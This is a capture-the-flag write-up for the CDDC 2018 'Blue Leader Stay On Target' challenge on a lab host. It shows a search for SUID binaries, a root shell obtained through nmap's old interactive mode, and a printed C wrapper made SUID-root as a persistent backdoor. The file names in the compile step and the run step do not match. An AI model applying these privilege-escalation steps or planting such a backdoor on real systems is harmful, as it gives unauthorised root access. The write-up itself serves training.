CDDC 2018: Blue Leader Stay On Target

Category: Kamikaze Points: 163 Description:

  1. Inside the target 10.50.199.11, escalate your privilege level and obtain root access, i.e. become root.
  2. Access the ' /root ' directory on the target 10.50.199.11 and identify the file with permission bits set to -r-------- .
  3. Access the file, display the file's content and enter the content into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

From the last part of the previous challenge, we have hero's password for 10.50.199.11. With that, we can login to the shell,

[root@fw2018 ~]# ssh hero@10.50.199.11
hero@10.50.199.11's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Jun  1 15:42:49 UTC 2018

  System load:  0.08              Processes:           82
  Usage of /:   23.1% of 9.81GB   Users logged in:     0
  Memory usage: 6%                IP address for eth0: 10.50.199.11
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Fri Jun  1 15:42:49 2018 from 10.50.199.2
hero@cddc-t041-ot-svr1:~$

Given that we are supposed to attempt privilege escalation, let's try the simplest solution, to find all SUIDed files and lo and behold, we have nmap. The earlier versions of nmap had --interactive, so this became a big loophole in security!

hero@cddc-t041-ot-svr1:~$ find / -executable -user root -perm -4000 2>/dev/null
/usr/local/bin/nmap
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mtr
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/sudo
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/ping
/bin/mount
/bin/fusermount
/bin/umount
/bin/su
/bin/ping6

As we have a way to get a shell in nmap, we have to prepare some improvement of life solutions like the convenient SUID wrapper below,

#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/types.h>

int main(void) {
    if (setuid(0) || setgid(0))
        err(1, "setuid/setgid");
    fputs("we have root privs now...\n", stderr);
    execl("/bin/bash", "bash", NULL);
    err(1, "execl");
}

Just compile with the good old gcc with gcc suidwrapper.c -o suidwrapper and we can now attempt to use nmap to escalate,

hero@cddc-t041-ot-svr1:~$ nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> whoami
Unknown command (whoami) -- press h <enter> for help
nmap> !sh
# whoami
root
# ls
suidhelper  suidhelper.c
# chmod u+s suidhelper
# ls -lah
total 8.2M
drwxr-xr-x 3 hero hero 4.0K Jun  1 15:51 .
drwxr-xr-x 6 root root 4.0K May 14 07:31 ..
-rw------- 1 hero hero 1.2K Jun  1 15:42 .bash_history
-rw-r--r-- 1 hero hero  220 Feb 13 08:06 .bash_logout
-rw-r--r-- 1 hero hero 3.6K Feb 13 08:06 .bashrc
drwx------ 2 hero hero 4.0K May 14 07:29 .cache
-rwxr-xr-x 1 hero hero  156 Jun  1 15:47 compile.sh
-rw-rw-r-- 1 hero hero 4.1K Jun  1 15:46 doubleput.c
-rw-rw-r-- 1 hero hero 2.2K Jun  1 15:46 hello.c
-rw-r--r-- 1 hero hero  675 Feb 13 08:06 .profile
-rwsrwxr-x 1 root root 8.6K Jun  1 15:47 suidhelper
-rw-rw-r-- 1 hero hero  256 Jun  1 15:47 suidhelper.c
-rw------- 1 hero hero 3.1K Jun  1 15:51 .viminfo
-rwxrwxr-x 1 hero hero 8.1M Jun  1 15:32 wew
-rw-rw-r-- 1 hero hero  19K Jun  1 15:32 wew.c
# exit
waiting to reap child: No child processes (10)
nmap> exit

Now, to win the challenge, just run our free root shell helper now.

hero@cddc-t041-ot-svr1:~$ ./suidhelper 
we have root privs now...
root@cddc-t041-ot-svr1:~# cd /root
root@cddc-t041-ot-svr1:/root# ls
evidence
root@cddc-t041-ot-svr1:/root# cat evidence 
Well done ! Way to go !!

Therefore, the flag is Well done ! Way to go !!.

results matching ""

    No results matching ""